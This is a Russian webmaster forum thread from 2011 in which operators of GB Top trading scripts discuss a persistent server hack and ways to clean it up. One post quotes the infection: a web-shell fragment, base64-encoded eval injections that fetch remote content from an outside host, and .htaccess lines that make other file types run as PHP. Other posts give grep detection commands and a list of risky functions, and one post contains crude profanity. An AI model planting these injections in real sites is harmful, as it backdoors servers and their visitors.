Master-X
Форум | Новости | Статьи
Главная » Форум » Топы » 
Тема: (Лечение!) Ахтунг атакуют топы или дыра GB Top
цитата
01/02/11 в 21:28
 CrazyMen
Как я понимаю единственным верным решением следует одно - это удаление формы webmasters.php? Нет формы для сабмита - нет взлому. Значит нужно написать скрипт который будет обрабатывать запрос и отправлять его на мыло мастера. Как предложил J_Geer:. Идея отличная только как статитику проверять трейдеры будут? Еще бы не плохо капчу конечно и еще фишки какие нибудь прикрутить.
цитата
02/02/11 в 00:43
 J_Geer
Со статистикой пока сам не придумал... хотя кое-кто ее и не давал, видел такое... А капча в моей форме есть, попробуй, может понравится скриптик...
цитата
02/02/11 в 18:30
 CrazyMen
J_Geer: На мультинишевом как быть надо бы две формы одна для однонишевых другая для мультинишевых
цитата
02/02/11 в 21:07
 J_Geer
Ну так для универсальности просто еще одно поле добавить - категории. Не сообразил сразу. Добавлю по наличию времени.
По поводу взлома. Сказка не закончилась. Вчера чисто случайно залез на одном из виртуалов в папку с картинками на чисто HTML'ьном сайтике вовсе без GB TOPа на домене, и обнаружил там outclick.php (22,7 кб):


$auth_pass = "af0209exxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; #root
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\

и т.д. Пролез по остальным доменам на этом виртуале, и обнаружил, что ВСЕ индекс.php всех скриптов либо заинклужены кодом:


eval(base64_decode('JGZpbGUgPSBAaW1wbG9kZSgiIixmaWxlKCJodHRwOi8vY3J2LmNjL2NjP2M9Ii4kX1NFUlZFUlsnUkVNT1RFX0FERFInXSkpOyBlY2hvICRmaWxlOw=='));
или

eval(base64_decode('JGNoID0gY3VybF9pbml0ICgpOwpjdXJsX3NldG9wdCAoJGNoICwgQ1VSTE9QVF9VUkwgLCAiaHR0cDovL2Nydi5jYy9jYy8/Yz0iLiRfU0VSVkVSWydSRU1PVEVfQUREUiddKTsKY3VybF9zZXRvcHQgKCRjaCAsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIgLCAxICk7CiRnZXRjYyA9IGN1cmxfZXhlYygkY2gpOwpjdXJsX2Nsb3NlKCRjaCk7CmVjaG8gJGdldGNjOw=='));
, причем не обязательно в конце файла, либо подменены на кодированную хрень размером 22,7 или 36,3 кб. При этом скрипты работали. Но особенно мне не понравился тот момент, что все файлы стояли под chmod 444, а зенденые индексы FET CJ оказались дезендеными с выше указанным инклудом.Кроме того, при очередной проверке топов нашел несколько подмененных htaccess'ов (99 байт вместо 112):


php_flag register_globals On
AddHandler application/x-httpd-php .php .htm .html .phtml .shtml .dat

в memberfiles, datafiles(его там, по-моему вообще не должно быть) и backup GB TOP'ов.
Логично предположить, что следующий трипер будет сидеть уже в любых, в т.ч. и dat файлах, не только php.

У кого дедики/вдски - попробуйте прогнать из под шелла (первый ключ - латинское эль маленькое, не латинское И большое!)
grep -l -r PathDenyFilter *
grep -l -r auth_pass *
grep -l -r ftpaccess *
grep -l -r '$default_action = "FilesMan"' *
grep -l -r 'php_flag register_globals On' *
grep -l -r 'AddHandler application/x-httpd-php' *
, и просмотрите содержимое выданных файлов. Если что-то отыщете типа выше приведенного, погоняйте еще по разным кускам своего кода.

На всякий случай: grep работает "сверху вниз", т.е. при старте из /home ищется во всех апаках ниже ее и в ней самой, если стартуете из / - ищется во всех файлах.
цитата
02/02/11 в 22:19
 CrazyMen
Я вчера проверил еще как. В общем абсолютно все index.php изменены. Размер новых был в районе 20кб хотя должен быть 14кб. Нашел и бэкдор в абсолютно а другом домене не относящихся к топам. Ищите да найдете!

З.Ы. Кстати за все время переполоха ни кто не предложил перейти на DF Lite
цитата
03/02/11 в 04:14
 J_Geer
Сделал PHP скрипт для поиска по серверу - для тех, у кого виртуалы без SSH. Кому надо - кину в личку.
Тоже нашел триппер в абсолютно не относящихся к топам доменах.
цитата
03/02/11 в 10:29
 CrazyMen
Мэн мне скинь тоже
цитата
03/02/11 в 19:14
 CrazyMen
Уже воспользовался твоим скриптом. Коненчо муторно добавлять трейдеров, но зато безопасно. Что хотелось бы внести по этому поводу:

Упорядочить как в админке на добавление, те:
domain
url
Banner
category
Title
Desc
Mail
И подобное...
И коненчо возможность вносить ниши. По идее рулесы не нужны. Количесвто символов лучше не ограничивать конкретно в майле ,баннерах и урлах. А вот проверку на допустимость симолов лучше сделать, чтобы не сабмитили скажем там %^&*+" и прочее
цитата
03/02/11 в 21:20
 CrazyMen
Сука! Гандон! Пидор! Опять! Бляяяять! Как? Только вчера все вычистил сука, все пароли поменял.. Урод чтоб у тебя хуй отсох! Бля гад отъебись по человечески прошу!
цитата
03/02/11 в 21:32
 Zeus
CrazyMen писал:
Кстати за все время переполоха ни кто не предложил перейти на DF Lite

Lite не поддерживает, кроме всего прочего, безресетники, которые у большинства на гб. Кстати, если кто-то вдруг решит перейти на дф, могу поделиться готовым решением, значительно облегчающим переход (как-то преходилось переносить базы с гб).
цитата
03/02/11 в 21:35
 CrazyMen
Zeus: Спасибо! Если что будем знать!

Последний раз редактировалось: CrazyMen (04/02/11 в 07:22), всего редактировалось 1 раз
цитата
03/02/11 в 22:46
 -=Faraon=-
мало того ин по ауту у него нету следовательно накрутить элементарно. или уже умеет?
цитата
03/02/11 в 23:44
 J_Geer
CrazyMen: кинул в личку...
цитата
04/02/11 в 07:23
 CrazyMen
J_Geer: В про версии вроде считает все.
цитата
04/02/11 в 10:09
 Alexandur
CrazyMen писал:
Уже воспользовался твоим скриптом. Коненчо муторно добавлять трейдеров, но зато безопасно.

Бесполезно это всё icon_smile.gif
Шелл сидит на сервере и прятать форму добавления бессмысленно.

J_Geer писал:
У кого дедики/вдски - попробуйте прогнать из под шелла (первый ключ - латинское эль маленькое, не латинское И большое!)

Ещё нужно искать:
eval
base64_decode
unpack
system
exec
passthru
shell_exec
popen
...

и ещё куча вариантов, в т.ч. и закрытые енкодерами скрипты, которые вообще не поймаешь icon_smile.gif
цитата
04/02/11 в 10:50
 _4eburek
Те кого постоянно ломают попробуйте топы поднять на новом хосте (базу только перенесите), и через свою форму сабмиты принимайте. А то не понимаю вашей тяги постоянно чинить и чистить. Если уже третий месяц все ломают нужно уже что то делать. Я вот заметил уже у некоторых пока сабмит форма закрыта. Надеюсь временно, пока все чин чинарем не заработает.
цитата
04/02/11 в 11:41
 J_Geer
Проблема уже не в топах... Все это дерьмо рассеивается по всему серверу независимо от скрипта. И индексы подменялись в любых скриптах. Где-то сидит зараза, чистки и смена паролей на помогают. Причем зараза влегкую всовывает файлы в папки с чмодом 555 и влезает в файлы с чмодом 444. icon_eek.gif

Последний раз редактировалось: J_Geer (04/02/11 в 12:01), всего редактировалось 1 раз
цитата
04/02/11 в 11:58
 _4eburek
ну вот я и говорю поднимите все на другом сервере. А то 3 месяца заниматься чистками это вредно для нервной системы.
цитата
04/02/11 в 12:05
 J_Geer
Хорошее решение icon_smile.gif)) - поднять 60+ сайтов на другом сервере, тем паче что у меня виртуалы на год почти проплачены... И не факт, что триппер не перетащишь...
цитата
04/02/11 в 18:11
 Дольчик ххх
CrazyMen писал:
вчера все вычистил сука, все пароли поменял.. Урод чтоб у тебя хуй отсох! Бля гад отъебись по человечески прошу!

CrazyMen Попробуй действительно перенести хотя бы часть хозяйства на новый сервак! Вот я заметил такую особенность, У меня есть топы скрипта ГБ версии когда еще можно было взломать, так эти топы периодически статистику перекасаебывает, учитывая что скрипт обновлял, а есть топы которые сразу ставил новую версию скрипта, не сырую, делал restore, так с такими топами пока все в порядке, если не хочешь переезжать, удаляй все и настраивай все по новой! А лучшего всего установить скрипт и все ручками забить! П.С. честно тож надоели эти последствия..... ;)
цитата
04/02/11 в 18:36
 _4eburek
J_Geer: Ну 60 сайтов это не так уж и много, хотя смотря какие сайты там кроме ГБшных топов висят. Лучше уж недельку потратить на перетаскивание, чем 3 месяца на чистки и зачистки и трату нервов. А когда все перетащишь с виртуалов, то попросишь чтобы резетнули тебе они их и можешь там еще сетку топов поднять.
цитата
04/02/11 в 21:16
 CrazyMen
Ох мля и заепся... Конечно перезд на другой сервер дело относительно не сложное, но! При переезде смениться айпи что отразится на СЕО. Возможна потеря информации. Сиджи сдохнут. Может лучше поставить DF Lite, а со временем перейти на Pro? А может действительно скинутся и выпустить самописный? icon_neutral.gif
цитата
04/02/11 в 21:58
 J_Geer
_4eburek: в соем случае это реально много, т.к. топов там с десяток, а остальное FET'ы, протоны как топовые фрихи, сплоги на разных скриптах, просто фрихи завязанные на сутру, несколько белых сайтов на разных скриптах и туева хуча галер... так что это вовсе не неделька получится... icon_sad.gif
цитата
04/02/11 в 23:29
 J_Geer
CrazyMen писал:
А может действительно скинутся и выпустить самописный? icon_neutral.gif

Ну так чисто топы прекрасно живут и на TE, протоновских клонах, FetCJ...
цитата
06/02/11 в 15:10
 CrazyMen
J_Geer: Это как? Там же нет учета статистики за 7 дней?
Стр. « первая   <  3, 4, 5, 6  >  последняя »


Эта страница в полной версии